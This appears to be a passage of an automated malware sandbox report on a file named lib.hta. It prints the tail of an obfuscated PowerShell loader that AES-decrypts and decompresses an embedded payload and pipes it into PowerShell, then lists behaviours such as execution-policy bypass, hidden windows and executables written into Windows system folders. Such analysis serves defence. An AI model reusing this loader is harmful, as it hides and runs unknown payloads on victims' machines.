+A/7/EtXZSBpK4tX7bX+nyDuOzqfwNPN+rUmAsisSLpVAxhBjTpUFcYo+/csQtelvOeu1dulGj36t9ZvXj2r9dNwEL0bWlglPeIawQsirYkh2NdPo690IdZHdd8zJZZLtSXw9c+Hill+FqhN1dRqI4tW+AV5FbnI546YGl9DWX9aQSwt6lEgsFee81oYAkYlGCYQXerJJ2VsD3uORrgt+NXHFUVO88mH4vdxy68ml9jmY68KB9ktbtRvCpAglahhY3+WcRLsXtuGvziHH814XK8+PMPcEVxA5OqH5vjnlYO0ST86E+uZNTC/4PrHITnc53gcifABKNJXq4LpvHiySAsbripkHX+Qj5j8ydbVmDeKu/++vRoKaL+W+zHuXUDVT+1dJygSKATg6sUUS7TpSMvftEBHE/+/zWbQexdtVBEVldJm46B4yIWL2pdA0U3JzNFORi5FdCC0fJwAQe3sHK4HxfWiCCV6egc5DxMQJEh8QN0K4NumNvg2G8/ytvqjqVHfKHWGkabTQql/9ZiWOPieDLpy9El/Y4YSxaJ8GRWGsVpdkDXFm16RkQhUCwD5BcQjt1GR4il1Is9aseJDcP6QdLzBXqaeeD0tZiL5SshOBXe8Vd6wKACSCBcmjE2534LfzCC6xSQwrr2iFhl29lXWd9MSktqtMef054DZ/J/L56sfmgWVwell7hqabtGWUZtx882ocnIyDLYKAVx97i217JG5BrrSq8KFY3V7Wi90naSw4V3QtKW2GZkQ7K5NpZ6L4DOq788OtzmO3/5DYzfoKFoZjvmuMDPjuvAPplz8v7HZ8m0L3AaC/XKd+uSrhyi7PzTLmxdG1rcjSPygCSBZgHAAX0gOmp1sfU470dA6wUU8grg/T35NwFuKqjsUVWoOuNB38nJyoCMLnC5PUjaySa2D2t+2XJV41g1wMRoUXkxpZyB9rwXttNNhohx/GIf70kCsJgpPg7v1+dl95wsSd3X/zaJdSyIzNzmAdhCvdIboT1xHYg2I3Iip+l6spO45cRmqdTXrXo57UTKTMq6k737C8bI++FclfRFlzYZCh5DzHa5VwTMvVTEg+97q7qAiOHHL/vhR6D6CjcBoKY/OshdEe8KJB07bjtLfzpKX+fKYXBli82pSc0tBd14PkMonKDWYyhdgep+ppaQvrZuOaH/fMZoodM5+JIwftgcJoItnbbJ2Gum7mCMLjE';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell -

Creates a suspicious Powershell process (4 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

lib.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All